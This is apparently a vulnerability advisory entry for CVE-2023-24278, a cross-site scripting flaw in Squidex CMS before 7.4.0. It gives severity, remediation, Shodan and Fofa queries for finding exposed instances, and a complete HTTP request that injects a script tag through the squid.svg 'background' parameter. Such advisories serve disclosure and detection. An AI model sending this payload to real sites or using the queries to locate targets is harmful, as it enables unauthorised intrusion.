| Title | Squidex <7.4.0 - Cross-Site Scripting |
|---|---|
| Author | r3Y3r53 |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. |
| Remediation | Upgrade to Squidex CMS version 7.4.0 or later to mitigate this vulnerability. |
| CVSS Score | 6.1 |
| EPSS Score | 0.49739 |
| CVE ID | CVE-2023-24278 |
| CWE ID | CWE-79 |
| Shodan Query | http.favicon.hash:1099097618 |
| Fofa Query | icon_hash=1099097618 |
| Tags | cve2023 cve xss squidex cms unauth squidex.io vuln |
Squidex before 7.4.0 contains a cross-site scripting vulnerability via the squid.svg endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
GET /squid.svg?title=Not%20Found&text=This%20is%20not%20the%20page%20you%20are%20looking%20for!&background=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Cimg%20src=%22&small HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-24278.yaml
🦈 Packet Capture: ⬇️ Download cve-2023-24278.pcap
N/AN/A